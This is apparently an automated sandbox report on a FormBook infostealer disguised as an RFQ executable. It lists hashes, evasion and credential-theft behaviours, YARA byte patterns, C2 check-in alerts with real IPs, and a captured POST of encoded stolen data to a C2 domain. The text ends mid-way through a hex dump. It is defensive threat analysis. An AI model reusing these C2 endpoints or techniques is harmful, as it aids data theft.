Edit tour

Windows Analysis Report
AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Overview

General Information

Sample name:	AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Analysis ID:	1531497
MD5:	53770b8b5cd580ee1e3d41f7f1eea3ca
SHA1:	09680223785a08879a89c2bab84c6883eb851a41
SHA256:	834d4e9657f33ca5bea5956050e5188ecd53b8a2fcad2b6136dc60f83619691a
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64native

AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe (PID: 8576 cmdline: "C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe" MD5: 53770B8B5CD580EE1E3D41F7F1EEA3CA)

AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe (PID: 8952 cmdline: "C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe" MD5: 53770B8B5CD580EE1E3D41F7F1EEA3CA)

nosimiokOMOHm.exe (PID: 4240 cmdline: "C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

write.exe (PID: 9096 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)

nosimiokOMOHm.exe (PID: 7868 cmdline: "C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 6004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x454d6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2d6b5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d626c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2be44b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d626c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2be44b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe PID: 8576	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-11T10:00:35.277880+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49818	3.33.130.190	80	TCP
2024-10-11T10:01:03.691246+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49822	75.2.103.23	80	TCP
2024-10-11T10:01:17.592879+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49826	161.97.168.245	80	TCP
2024-10-11T10:01:31.644581+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49830	65.21.196.90	80	TCP
2024-10-11T10:02:00.836243+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49838	91.212.26.5	80	TCP
2024-10-11T10:02:14.990437+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49842	3.33.130.190	80	TCP
2024-10-11T10:02:29.183801+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49846	154.23.184.194	80	TCP
2024-10-11T10:02:42.719623+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49850	63.250.47.57	80	TCP
2024-10-11T10:02:56.351030+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49854	172.67.220.57	80	TCP
2024-10-11T10:03:10.149686+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49858	68.66.226.116	80	TCP
2024-10-11T10:03:23.395049+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49862	76.223.54.146	80	TCP
2024-10-11T10:03:37.530714+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49866	15.197.148.33	80	TCP
2024-10-11T10:03:51.673474+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49870	15.197.148.33	80	TCP
2024-10-11T10:04:11.865115+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49874	15.197.148.33	80	TCP
2024-10-11T10:04:26.019091+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49878	15.197.148.33	80	TCP
2024-10-11T10:04:34.312776+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49879	3.33.130.190	80	TCP
2024-10-11T10:04:47.455367+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49883	75.2.103.23	80	TCP
2024-10-11T10:05:00.936209+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49887	161.97.168.245	80	TCP
2024-10-11T10:05:14.537873+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49891	65.21.196.90	80	TCP
2024-10-11T10:05:41.553278+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49899	91.212.26.5	80	TCP
2024-10-11T10:05:54.695887+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49903	3.33.130.190	80	TCP
2024-10-11T10:06:08.790913+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49907	154.23.184.194	80	TCP
2024-10-11T10:06:22.218102+0200	2855465	1	A Network Trojan was detected	192.168.11.20	49911	63.250.47.57	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-11T09:59:32.283365+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49890	65.21.196.90	80	TCP
2024-10-11T09:59:32.283365+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49861	76.223.54.146	80	TCP
2024-10-11T10:00:55.773219+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49819	75.2.103.23	80	TCP
2024-10-11T10:00:58.409243+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49820	75.2.103.23	80	TCP
2024-10-11T10:01:01.052052+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49821	75.2.103.23	80	TCP
2024-10-11T10:01:09.353742+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49823	161.97.168.245	80	TCP
2024-10-11T10:01:12.072207+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49824	161.97.168.245	80	TCP
2024-10-11T10:01:14.961548+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49825	161.97.168.245	80	TCP
2024-10-11T10:01:23.442550+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49827	65.21.196.90	80	TCP
2024-10-11T10:01:26.208699+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49828	65.21.196.90	80	TCP
2024-10-11T10:01:28.917926+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49829	65.21.196.90	80	TCP
2024-10-11T10:01:52.727953+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49835	91.212.26.5	80	TCP
2024-10-11T10:01:55.435186+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49836	91.212.26.5	80	TCP
2024-10-11T10:01:58.136177+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49837	91.212.26.5	80	TCP
2024-10-11T10:02:06.154795+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49839	3.33.130.190	80	TCP
2024-10-11T10:02:09.697567+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49840	3.33.130.190	80	TCP
2024-10-11T10:02:11.424776+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49841	3.33.130.190	80	TCP
2024-10-11T10:02:20.703290+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49843	154.23.184.194	80	TCP
2024-10-11T10:02:23.532170+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49844	154.23.184.194	80	TCP
2024-10-11T10:02:26.358729+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49845	154.23.184.194	80	TCP
2024-10-11T10:02:34.653450+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49847	63.250.47.57	80	TCP
2024-10-11T10:02:37.332906+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49848	63.250.47.57	80	TCP
2024-10-11T10:02:40.027583+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49849	63.250.47.57	80	TCP
2024-10-11T10:02:48.475974+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49851	172.67.220.57	80	TCP
2024-10-11T10:02:51.124931+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49852	172.67.220.57	80	TCP
2024-10-11T10:02:53.744492+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49853	172.67.220.57	80	TCP
2024-10-11T10:03:02.658779+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49855	68.66.226.116	80	TCP
2024-10-11T10:03:05.334660+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49856	68.66.226.116	80	TCP
2024-10-11T10:03:08.064235+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49857	68.66.226.116	80	TCP
2024-10-11T10:03:15.480307+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49859	76.223.54.146	80	TCP
2024-10-11T10:03:18.116647+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49860	76.223.54.146	80	TCP
2024-10-11T10:03:28.716241+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49863	15.197.148.33	80	TCP
2024-10-11T10:03:32.758698+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49864	15.197.148.33	80	TCP
2024-10-11T10:03:33.986833+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49865	15.197.148.33	80	TCP
2024-10-11T10:03:43.775100+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49867	15.197.148.33	80	TCP
2024-10-11T10:03:45.483332+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49868	15.197.148.33	80	TCP
2024-10-11T10:03:48.126941+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49869	15.197.148.33	80	TCP
2024-10-11T10:03:57.922511+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49871	15.197.148.33	80	TCP
2024-10-11T10:03:59.637772+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49872	15.197.148.33	80	TCP
2024-10-11T10:04:03.186563+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49873	15.197.148.33	80	TCP
2024-10-11T10:04:17.196234+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49875	15.197.148.33	80	TCP
2024-10-11T10:04:20.737161+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49876	15.197.148.33	80	TCP
2024-10-11T10:04:22.458612+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49877	15.197.148.33	80	TCP
2024-10-11T10:04:39.533867+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49880	75.2.103.23	80	TCP
2024-10-11T10:04:42.172571+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49881	75.2.103.23	80	TCP
2024-10-11T10:04:44.822433+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49882	75.2.103.23	80	TCP
2024-10-11T10:04:52.824165+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49884	161.97.168.245	80	TCP
2024-10-11T10:04:55.534451+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49885	161.97.168.245	80	TCP
2024-10-11T10:04:58.241985+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49886	161.97.168.245	80	TCP
2024-10-11T10:05:06.333622+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49888	65.21.196.90	80	TCP
2024-10-11T10:05:09.083768+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49889	65.21.196.90	80	TCP
2024-10-11T10:05:33.432587+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49896	91.212.26.5	80	TCP
2024-10-11T10:05:36.142901+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49897	91.212.26.5	80	TCP
2024-10-11T10:05:38.854707+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49898	91.212.26.5	80	TCP
2024-10-11T10:05:48.182063+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49900	3.33.130.190	80	TCP
2024-10-11T10:05:49.409638+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49901	3.33.130.190	80	TCP
2024-10-11T10:05:52.943286+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49902	3.33.130.190	80	TCP
2024-10-11T10:06:00.311613+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49904	154.23.184.194	80	TCP
2024-10-11T10:06:03.140270+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49905	154.23.184.194	80	TCP
2024-10-11T10:06:05.967461+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49906	154.23.184.194	80	TCP
2024-10-11T10:06:14.161092+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49908	63.250.47.57	80	TCP
2024-10-11T10:06:16.851835+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49909	63.250.47.57	80	TCP
2024-10-11T10:06:19.543548+0200	2855464	1	A Network Trojan was detected	192.168.11.20	49910	63.250.47.57	80	TCP

HTTP traffic detected: POST /o7wc/ HTTP/1.1Host: www.heeraka.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.heeraka.infoConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.heeraka.info/o7wc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4Data Raw: 41 54 6b 3d 71 71 72 4c 76 30 35 53 38 74 70 52 73 6d 58 31 5a 6b 62 52 30 6a 45 79 5a 43 72 38 34 31 31 6f 71 70 36 32 57 43 51 73 2f 45 7a 74 69 71 2f 34 66 30 53 64 75 69 64 33 39 70 59 46 35 31 66 56 31 71 6b 56 6f 6e 71 75 57 49 35 72 6d 45 63 48 42 2f 4c 6f 63 49 7a 6a 68 32 31 4b 6c 74 75 78 54 45 37 50 44 6b 55 67 55 78 52 75 78 31 78 6b 4e 53 50 53 33 44 43 49 69 72 7a 52 4e 32 4d 33 73 73 54 47 6e 5a 6f 79 6c 4a 66 37 58 64 65 4f 79 35 2f 50 68 6a 43 35 31 66 2f 43 56 59 36 72 2b 50 67 73 4e 37 68 68 45 76 30 50 52 6f 45 34 2b 45 41 4f 71 78 32 65 4a 46 62 6c 79 51 6a 32 55 77 3d 3d Data Ascii: ATk=qqrLv05S8tpRsmX1ZkbR0jEyZCr8411oqp62WCQs/Eztiq/4f0Sduid39pYF51fV1qkVonquWI5rmEcHB/LocIzjh21KltuxTE7PDkUgUxRux1xkNSPS3DCIirzRN2M3ssTGnZoylJf7XdeOy5/PhjC51f/CVY6r+PgsN7hhEv0PRoE4+EAOqx2eJFblyQj2Uw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 08:01:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 